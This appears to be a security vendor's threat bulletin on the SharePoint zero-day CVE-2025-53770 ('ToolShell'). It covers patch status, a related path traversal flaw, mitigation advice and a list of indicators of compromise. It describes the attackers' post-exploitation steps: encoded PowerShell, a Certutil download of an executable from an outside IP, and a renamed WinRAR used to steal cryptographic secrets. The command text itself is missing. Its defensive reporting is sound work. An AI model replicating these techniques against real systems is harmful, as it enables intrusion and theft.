Update 2025-07-22, 13:23 UTC: Blog has been updated with data on expoitation attempts,

Update 2025-07-22, 12:37 UTC: Blog has been updated with additional details about post-exploitation activity.

Update 2025-07-21, 10:40 UTC: Blog has been updated with additional indicators of compromise (IOCs).

Microsoft has partially patched a zero-day vulnerability in SharePoint following reports of its exploitation in the wild. The vulnerability (CVE-2025-53770), dubbed ToolShell, affects on-premises SharePoint servers and gives an attacker unauthenticated access to vulnerable servers, allowing them to remotely execute code and access all content and file systems. While the 2019 version of SharePoint Server and SharePoint Server Subscription Edition have been patched, the 2016 version remains unpatched.

In its guidance on the vulnerability, Microsoft said it was “aware of active attacks targeting on-premises SharePoint Server customers”. It provided no further information on which actors were behind these attacks. 

The new zero-day vulnerability is a variant of a recently patched vulnerability, CVE-2025-49704, which was patched in July 2025. 

Protection

Symantec products already block exploitation of this vulnerability with the following network protection: Web Attack: Microsoft SharePoint CVE-2025-49704. 

Related vulnerabilities

A second, related vulnerability (CVE-2025-53771) has also been patched. A path traversal bug, it allows an authorized attacker to perform spoofing over a network. It too is a variant of a recently patched vulnerability (CVE-2025-49706) and the patch includes more robust protections against exploitation of the older flaw.

Post exploitation activity

One some networks where post-exploitation activity took place, the attackers first ran an encoded PowerShell command. The attackers then used Certutil to download a file named client.exe (SHA256: fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274) from 134.199.202[.]205 and save it as a file named debug.js. 

PowerShell was used to run commands as below with the –value parameter used to pass commands:

The executable was likely renamed as debug.js in order to make it look benign and avoid raising suspicions. It then ran the following batch file located at c:\\temp\\test.bat:

The executable was also used to run the following files:

• powershell.exe
• tasklist.exe
• ipconfig.exe
• net.exe
• nltest.exe
• systeminfo.exe
• backup.exe
• arp.exe

Backup.exe is a renamed variant of WinRAR. It was used to steal cryptographic secrets:

In addition to this, Certutil was also used to download a file named agent.x64.exe (SHA256: 04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6). This was used to launch a file named project1.exe (SHA256 : 430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d)

Mitigation and guidance

In addition to immediately updating to the latest version of SharePoint, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) is advising users to monitor for POSTs to:

Users are also advised to conduct scanning for the following IP addresses: 107.191.58[.]76, 104.238.159[.]149, and 96.9.125[.]147, particularly between July 18-19, 2025.

Protection/Mitigation

Network protection

Web Attack: Microsoft SharePoint CVE-2025-49704

For the latest protection updates, please visit the Symantec Protection Bulletin.

Indicators of Compromise

If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.

fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274

04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6

430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d

107.191.58[.]76

104.238.159[.]149

96.9.125[.]147

103.186.30[.]186

108.162.221[.]103

128.49.100[.]57

154.47.29[.]4

162.158.14[.]149

162.158.14[.]86

162.158.19[.]169

162.158.90[.]110

162.158.94[.]121

162.158.94[.]72

18.143.202[.]126

18.143.202[.]156

18.143.202[.]185

18.143.202[.]204

45.40.52[.]75

Note: IP addresses are a mixture of IPs scanning for and activity exploiting CVE-2025-53770